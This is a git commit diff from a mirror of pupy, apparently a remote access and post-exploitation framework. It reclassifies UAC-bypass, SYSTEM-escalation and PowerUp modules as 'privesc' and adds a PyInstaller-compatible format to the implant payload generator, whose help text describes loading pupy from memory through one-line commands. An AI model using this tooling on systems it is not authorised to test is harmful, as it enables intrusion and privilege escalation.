mirror of https://github.com/n1nj4sec/pupy.git
Merge remote-tracking branch 'upstream/master'
This commit is contained in:
commit
ef36a137ea
|
@ -0,0 +1,75 @@
|
|||
from collections import OrderedDict
|
||||
from Crypto.Cipher import AES
|
||||
from Crypto.Hash import HMAC
|
||||
from Crypto.Hash import SHA256
|
||||
from Crypto.Hash import SHA256, HMAC
|
||||
from Crypto import Random
|
||||
from Crypto.Protocol.KDF import PBKDF2
|
||||
from Crypto.Util import Counter
|
||||
from cStringIO import StringIO
|
||||
from itertools import izip, starmap
|
||||
from operator import xor
|
||||
from StringIO import StringIO
|
||||
from struct import Struct
|
||||
import argparse
|
||||
import base64
|
||||
import binascii
|
||||
import bz2
|
||||
import code
|
||||
import collections
|
||||
import configparser
|
||||
import copy
|
||||
import cPickle
|
||||
import Crypto.Cipher
|
||||
import Crypto.Cipher.AES
|
||||
import Crypto.Hash.HMAC
|
||||
import Crypto.Hash.SHA256
|
||||
import Crypto.Util.Counter
|
||||
import datetime
|
||||
import errno, stat
|
||||
import fractions
|
||||
import __future__
|
||||
import getpass
|
||||
import glob
|
||||
import hashlib
|
||||
import hmac
|
||||
import imp
|
||||
import importlib
|
||||
import inspect
|
||||
import json
|
||||
import logging
|
||||
import math
|
||||
import multiprocessing
|
||||
import new
|
||||
import os
|
||||
import pkgutil
|
||||
import platform
|
||||
import Queue
|
||||
import random
|
||||
import re
|
||||
import rsa
|
||||
import shlex
|
||||
import shutil
|
||||
import site
|
||||
import socket
|
||||
import SocketServer
|
||||
import ssl
|
||||
import string
|
||||
import StringIO
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
import urllib
|
||||
import urllib2
|
||||
import uuid
|
||||
import yaml
|
||||
import zlib
|
||||
if os.name == 'nt':
|
||||
import ctypes
|
||||
import ctypes.wintypes
|
||||
if os.name == 'posix':
|
||||
import pty
|
|
@ -8,7 +8,7 @@ __class_name__="BypassUAC"
|
|||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
|
||||
|
||||
@config(compat="windows", category="exploit")
|
||||
@config(compat="windows", category="privesc")
|
||||
class BypassUAC(PupyModule):
|
||||
""" try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
|
||||
dependencies=["psutil", "pupwinutils.processes"]
|
||||
|
|
|
@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo
|
|||
from modules.lib.windows.migrate import migrate
|
||||
__class_name__="GetSystem"
|
||||
|
||||
@config(compat="windows", category="exploit")
|
||||
@config(compat="windows", category="privesc")
|
||||
class GetSystem(PupyModule):
|
||||
""" try to get NT AUTHORITY SYSTEM privileges """
|
||||
dependencies=["psutil", "pupwinutils.security"]
|
||||
|
|
|
@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script
|
|||
__class_name__="PowerUp"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="admin")
|
||||
@config(compat="windows", category="privesc")
|
||||
class PowerUp(PupyModule):
|
||||
""" trying common Windows privilege escalation methods"""
|
||||
|
||||
|
@ -23,4 +23,4 @@ class PowerUp(PupyModule):
|
|||
|
||||
# parse output depending on the PowerUp output
|
||||
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
|
||||
self.success("%s" % output)
|
||||
self.success("%s" % output)
|
||||
|
|
|
@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf
|
|||
from pupylib.utils.network import get_local_ip
|
||||
from pupylib.utils.term import colorize
|
||||
from pupylib.payloads.python_packer import gen_package_pickled_dic
|
||||
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload
|
||||
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
|
||||
from pupylib.utils.obfuscate import compress_encode_obfs
|
||||
from network.conf import transports, launchers
|
||||
from network.lib.base_launcher import LauncherError
|
||||
|
@ -236,6 +236,7 @@ class ListOptions(argparse.Action):
|
|||
print "\t- exe_86, exe_x64 : generate PE exe for windows"
|
||||
print "\t- dll_86, dll_x64 : generate reflective dll for windows"
|
||||
print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
|
||||
print "\t- pyinst : generate a python file compatible with pyinstaller"
|
||||
print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line."
|
||||
print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."
|
||||
|
||||
|
@ -254,7 +255,7 @@ class ListOptions(argparse.Action):
|
|||
print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
|
||||
exit()
|
||||
|
||||
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner']
|
||||
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner']
|
||||
if __name__=="__main__":
|
||||
if os.path.dirname(__file__):
|
||||
os.chdir(os.path.dirname(__file__))
|
||||
|
@ -331,12 +332,15 @@ if __name__=="__main__":
|
|||
if not outpath:
|
||||
outpath="pupy.apk"
|
||||
get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf)
|
||||
elif args.format=="py":
|
||||
elif args.format=="py" or args.format=="pyinst":
|
||||
linux_modules = ""
|
||||
if not outpath:
|
||||
outpath="payload.py"
|
||||
if args.format=="pyinst" :
|
||||
linux_modules = getLinuxImportedModules()
|
||||
packed_payload=pack_py_payload(get_raw_conf(conf))
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload)
|
||||
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
|
||||
elif args.format=="py_oneliner":
|
||||
packed_payload=pack_py_payload(get_raw_conf(conf))
|
||||
i=conf["launcher_args"].index("--host")+1
|
||||
|
|
|
@ -4,5 +4,5 @@
|
|||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||
|
||||
#authorized categories
|
||||
categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"]
|
||||
categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"]
|
||||
|
||||
|
|
|
@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic
|
|||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
|
||||
|
||||
def getLinuxImportedModules():
|
||||
'''
|
||||
'''
|
||||
lines = ""
|
||||
with open(os.path.join(ROOT,"conf","imports_done.py")) as f:
|
||||
lines=f.read()
|
||||
return lines
|
||||
|
||||
def pack_py_payload(conf):
|
||||
print colorize("[+] ","green")+"generating payload ..."
|
||||
fullpayload=[]
|
||||
|
@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip="<your_ip>"):
|
|||
print 'KeyboardInterrupt received, shutting down the web server'
|
||||
server.socket.close()
|
||||
exit()
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue